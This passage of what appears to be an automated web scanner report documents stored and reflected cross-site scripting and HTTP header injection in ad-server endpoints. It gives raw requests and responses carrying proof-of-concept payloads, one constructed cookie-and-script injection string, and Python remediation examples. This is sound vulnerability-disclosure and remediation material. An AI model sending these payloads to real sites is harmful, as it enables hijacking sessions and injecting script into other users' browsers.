User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:42:30 GMT
Content-Length: 2862

<b>This is an unclosed string.</b><br/> at MS.Internal.Xml.XPath.XPathScanner.ScanString()<br/> at MS.Internal.Xml.XPath.XPathScanner.NextLex()<br/> at MS.Internal.Xml.XPath.XPathParser.ParsePri
...[SNIP]...
<br/> at System.Xml.XPath.XPathExpression.Compile(String xpath, IXmlNamespaceResolver nsResolver)<br/>
...[SNIP]...

3. Cross-site scripting (stored)
There are 2 instances of this issue:

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences: input should be validated as strictly as possible on arrival, given the kind of content it is expected to contain, and user input should be encoded for the context into which it is copied (HTML-encoding < > " ' and = as entities in HTML markup, and the stricter JavaScript-string encoding for script contexts such as the ones below). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the $ request parameter submitted to the URL /bar/v16-504/c5/jsc/fm.js is copied into a JavaScript string which is encapsulated in double quotation marks (zzStr) at the URL /bar/v16-504/c5/jsc/fm.js; it also lands in the single-quoted zzPat literal and in the FFpb Set-Cookie header. The payload b395d"-alert(1)-"5904c46bd2c was submitted in the $ parameter in Request 1. Request 2 omits the parameter and carries no FFpb cookie, yet the payload is returned unmodified in Response 2, so the value is being stored server-side (apparently keyed to the requester's ZEDOIDA cookie) rather than merely reflected. Whether a different user can be served the stored value decides the real impact; see the note on automated detection in the issue background.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value must be encoded for the JavaScript string context (\uXXXX-escaping every character outside [A-Za-z0-9], which also covers </script>, line breaks and U+2028/U+2029); escaping only the quote character in use leaves the other quote style and the enclosing script element exposed, as the two quoting contexts in this response show.

Request 1

GET /bar/v16-504/c5/jsc/fm.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=&$=b395d"-alert(1)-"5904c46bd2c&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311

Request 2

GET /bar/v16-504/c5/jsc/fm.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311

Response 2

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:b395d"-alert(1)-"5904c46bd2c,520d7%22%3b1cfa50ea780,520d7";expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=39:1:1:0:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=213
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:30 GMT
Content-Length: 1016
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='b395d"-alert(1)-"5904c46bd2c,520d7%22%3b1cfa50ea780,520d7"';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=b395d"-alert(1)-"5904c46bd2c,520d7%22%3b1cfa50ea780,520d7";z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;
var zzpixie = new Image();
var zzRandom = Math.random();
var zzD
...[SNIP]...

3.2. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the $ request parameter submitted to the URL /bar/v16-504/c5/jsc/fm.js is copied into a JavaScript string which is encapsulated in single quotation marks (zzPat) at the URL /bar/v16-504/c5/jsc/fm.js; it also lands in the double-quoted zzStr literal and in the FFpb Set-Cookie header. The payload 609c0'-alert(1)-'ce33e99e75d was submitted in the $ parameter in Request 1. Request 2 omits the parameter and carries no FFpb cookie, yet the payload is returned unmodified in Response 2, so the value is stored server-side (apparently keyed to the requester's ZEDOIDA cookie) rather than merely reflected. Whether a different user can be served the stored value decides the real impact.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value must be encoded for the JavaScript string context (\uXXXX-escaping every character outside [A-Za-z0-9], which also covers </script>, line breaks and U+2028/U+2029); escaping only the quote character in use leaves the other quote style and the enclosing script element exposed, as 3.1 and 3.2 together show.
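The following is an added example for 3.1 and 3.2 and for the remediation text above; it is not zedo's code. The template mirrors the two literals visible in the responses (single-quoted zzPat, double-quoted zzStr) and nothing else; the encoder and the small literal scanner are written for this page. The scanner handles only quoted string literals (no comments, regex or template literals), which is all the excerpted script contains.

```python
import re

# Shape of the zedo responses in 3.1 and 3.2: the parameter lands inside a
# single-quoted and a double-quoted literal (template constructed from the
# excerpts above; the rest of the script is omitted).
TEMPLATE = "var zzPat='{pat}';var zzStr=\"q={pat};z=\"+Math.random();"


def render_vulnerable(pat):
    """What the server does now: the raw value is dropped into the literals."""
    return TEMPLATE.format(pat=pat)


def js_string_encode(value):
    """Encode for a JavaScript string literal: every character outside
    [A-Za-z0-9] becomes \\uXXXX (one escape per UTF-16 code unit, so an
    astral character becomes a surrogate pair). Unlike backslash-escaping
    quotes or JSON-encoding, this also neutralises </script>, CR/LF and
    U+2028/U+2029, so the value is safe in either quote style and inside
    an inline <script> element."""
    out = []
    for ch in value:
        if ch.isascii() and ch.isalnum():
            out.append(ch)
            continue
        units = ch.encode("utf-16-be")
        for i in range(0, len(units), 2):
            out.append("\\u%04x" % int.from_bytes(units[i:i + 2], "big"))
    return "".join(out)


def render_hardened(pat):
    return TEMPLATE.format(pat=js_string_encode(pat))


def string_literals(js):
    """Walk `js` the way a JavaScript tokenizer does for string literals
    (both quote styles, backslash escapes) and return their contents in
    source order. Whatever falls outside these literals is executed as
    code, which is exactly what a break-out payload relies on."""
    literals, i, n = [], 0, len(js)
    while i < n:
        ch = js[i]
        if ch in "'\"":
            quote, start, i = ch, i + 1, i + 1
            while i < n and js[i] != quote:
                i += 2 if js[i] == "\\" else 1
            if i >= n:
                raise ValueError("unterminated string literal")
            literals.append(js[start:i])
        i += 1
    return literals


def js_decode(literal):
    """Reverse \\uXXXX escapes (recombining surrogate pairs) to recover the
    value the script sees at runtime."""
    s = re.sub(r"\\u([0-9a-fA-F]{4})",
               lambda m: chr(int(m.group(1), 16)), literal)
    return s.encode("utf-16", "surrogatepass").decode("utf-16")
```

With the 3.2 payload the first literal of the vulnerable script is just 609c0 and -alert(1)- sits outside any string; with the 3.1 payload zzPat survives intact (its quotes are single) but zzStr is cut to q=b395d. After js_string_encode both literals decode back to the full payload and the script contains no quote, angle bracket or line break from user data at all.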

Request 1

GET /bar/v16-504/c5/jsc/fm.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=&$=609c0'-alert(1)-'ce33e99e75d&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311

Request 2

GET /bar/v16-504/c5/jsc/fm.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311

Response 2

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:609c0'-alert(1)-'ce33e99e75d,1726d%27%3b9f644ea3489,1726d';expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=47:1:1:0:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=212
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:31 GMT
Content-Length: 1016
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='609c0'-alert(1)-'ce33e99e75d,1726d%27%3b9f644ea3489,1726d'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=609c0'-alert(1)-'ce33e99e75d,1726d%27%3b9f644ea3489,1726d';z="+Math.random();}

if(zzuid=='un
...[SNIP]...

4. HTTP header injection
There are 4 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any character with an ASCII code below 0x20 (CR and LF included) should be rejected, and the check must run on the value after URL decoding: in every instance below the server decoded %0d%0a before writing the Set-Cookie header, so a filter applied to the raw query string would not have seen the line break.
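As an added example for the four findings below (written for this page; not zedo's or atwola's server code), the following models a handler that copies a decoded query parameter into Set-Cookie, parses the resulting raw response the way a proxy or browser would, and then applies the control-character check from the remediation text. The response shape is trimmed from the 4.1 excerpt; the surrounding logic and the payload used in the usage note are constructed.

```python
from urllib.parse import unquote


def _response(cookie_value):
    """Trimmed shape of the 4.1 response; the cookie value is interpolated."""
    return ("HTTP/1.1 200 OK\r\n"
            "Server: ZEDO 3G\r\n"
            "Content-Type: application/x-javascript\r\n"
            f"Set-Cookie: FFpb=305:{cookie_value};domain=.zedo.com;path=/;\r\n"
            "\r\n"
            "var zzSection=263;")


def respond_vulnerable(dollar_param):
    """The URL-decoded query value goes straight into Set-Cookie, so a
    %0d%0a in the parameter becomes a real CRLF in the response head."""
    return _response(unquote(dollar_param))


def has_control_chars(value):
    """Minimum check from the remediation text: reject anything below 0x20
    (which covers CR, LF and NUL) plus DEL. It must see the *decoded*
    value, because that is what the server writes into the header."""
    return any(ord(c) < 0x20 or ord(c) == 0x7f for c in value)


def respond_hardened(dollar_param):
    """Decode first, validate, and refuse the request rather than 'clean'
    the value; a length cap keeps the cookie within the short-string
    allowlist the text recommends (64 is an assumed limit)."""
    value = unquote(dollar_param)
    if has_control_chars(value) or len(value) > 64:
        return "HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
    return _response(value)


def parse_response(raw):
    """Split a raw response the way a browser or proxy does: status line,
    one header per CRLF-terminated line, body after the first blank line.
    Lines without a colon are kept (value None) so an injected fragment
    such as the '606b90e0140' line in 4.1 stays visible."""
    head, _, body = raw.partition("\r\n\r\n")
    status, *lines = head.split("\r\n")
    headers = []
    for line in lines:
        name, sep, value = line.partition(":")
        headers.append((name.strip(), value.strip()) if sep else (line, None))
    return status, headers, body
```

Feeding respond_vulnerable a constructed value of the form 54f5b%0d%0aSet-Cookie:%20sess=attacker%0d%0a%0d%0a<script>alert(1)</script> yields a second, attacker-chosen Set-Cookie header and a body that begins with the script tag, which is the two-stage effect (new header, then break-out into the body) the issue background describes; respond_hardened answers the same input with a 400 and passes a plain alphanumeric value through unchanged.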


4.1. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 54f5b%0d%0a606b90e0140 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=&$=54f5b%0d%0a606b90e0140&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:54f5b
606b90e0140
,3654a';expires=Sun, 04 Sep 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=95:4:4:0:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=210
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:33 GMT
Content-Length: 950
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='54f5b

...[SNIP]...

4.2. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 386bc%0d%0a457ad93187f was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=&$=386bc%0d%0a457ad93187f&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:386bc
457ad93187f
,54f5b;expires=Sun, 04 Sep 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=37:9:9:1:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=192
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:51 GMT
Content-Length: 948
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='386bc

...[SNIP]...

4.3. http://c7.zedo.com/utils/ecSet.js [v parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The value of the v request parameter is copied into the Set-Cookie response header. The payload 72e24%0d%0acc2e3ed201c was submitted in the v parameter. This caused a response containing an injected HTTP header.

Request

GET /utils/ecSet.js?v=72e24%0d%0acc2e3ed201c&d=.zedo.com HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFcat=305,825,15; FFad=0; FFMChanCap=2457780B305,825#722607|0,1#0,24

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: 72e24
cc2e3ed201c
;expires=Tue, 04 Oct 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
ETag: "2971d9-1f5-47f29204ac3c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=1466
Date: Sun, 04 Sep 2011 01:05:04 GMT
Connection: close



4.4. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload 8a172%0d%0a0373f631884 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=LCN&si=8a172%0d%0a0373f631884&pi=-&xs=3&pu=http%253A//www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html%253Fifu%253Dhttp%25253A//www.google.com/trends/hottrends%25253Fq%25253Dsprint%252526date%25253D2011-9-3%252526sa%25253DX&df=1&v=6.0&cb=85182 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:06:51 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sun, 04 Sep 2011 01:21:51 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; path=/; expires=Wed, 29-Aug-12 01:06:51 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=; path=/; expires=Sun, 11-Sep-11 01:06:51 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1315097086^1315100211|17778^1315097086^1315100209|58dcd76bcc7cba0a0aa9256e^1315098376^1315100176|1777858dcd76b8a6d1b89539c8834^1315098377^1315100177|8a172
0373f631884
^1315098411^1315100211; path=/; expires=Sun, 04-Sep-11 01:36:51 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^; expires=Wed, 29-Aug-12 01:06:51 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:b2269f69029173967deb3f16e3a72f92,b2269f69029173967deb3f16e3a72f92; expires=Wed, 29-Aug-12 01:06:51 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6; expires=Wed, 29-Aug-12 01:06:51 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 102
Content-Type: application/x-javascript
Content-Length: 102

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='1765ifu1akkc79';
var ANSL='99999|^';
ANRTXR();


5. Cross-site scripting (reflected)
There are 121 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


5.1. http://ad.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53bfc"><script>alert(1)</script>20c739125c2 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=53bfc"><script>alert(1)</script>20c739125c2&sp=y HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=6291/9346
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2925993182975414771

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
